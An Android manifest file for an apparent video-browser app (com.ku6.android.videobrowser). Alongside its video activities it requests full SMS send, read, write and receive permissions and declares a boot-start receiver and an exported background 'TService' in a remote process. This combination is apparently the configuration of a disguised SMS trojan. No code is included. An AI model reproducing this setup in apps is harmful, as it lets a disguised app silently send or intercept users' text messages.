<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.ku6.android.videobrowser">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <application android:icon="@drawable/ku6" android:label="@string/app_name">
        <receiver android:enabled="true" android:name=".sms.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:exported="true" android:icon="@drawable/icon" android:label="TService" android:name=".sms.MessageService" android:process=":remote"/>
        <activity android:label="@string/app_name" android:name=".SplashActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name=".ChannelListViewList" android:screenOrientation="portrait"/>
        <activity android:name=".Iku6HomeList" android:screenOrientation="portrait"/>
        <activity android:name=".RankList" android:screenOrientation="portrait"/>
        <activity android:name=".SelectList" android:screenOrientation="portrait"/>
        <activity android:name=".VideodetailView" android:screenOrientation="portrait"/>
        <activity android:name=".Search_Activity" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:name=".Search_Result_Activity" android:screenOrientation="portrait" android:windowSoftInputMode="adjustPan"/>
        <activity android:name=".Download_Activity" android:screenOrientation="portrait"/>
        <activity android:name=".CollectionHistory_Activity" android:screenOrientation="portrait"/>
        <activity android:name=".About_Activity" android:screenOrientation="portrait"/>
        <activity android:name=".ChargeActivity" android:screenOrientation="portrait"/>
        <activity android:name=".SettingList" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.settings.WIRELESS_SETTINGS"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
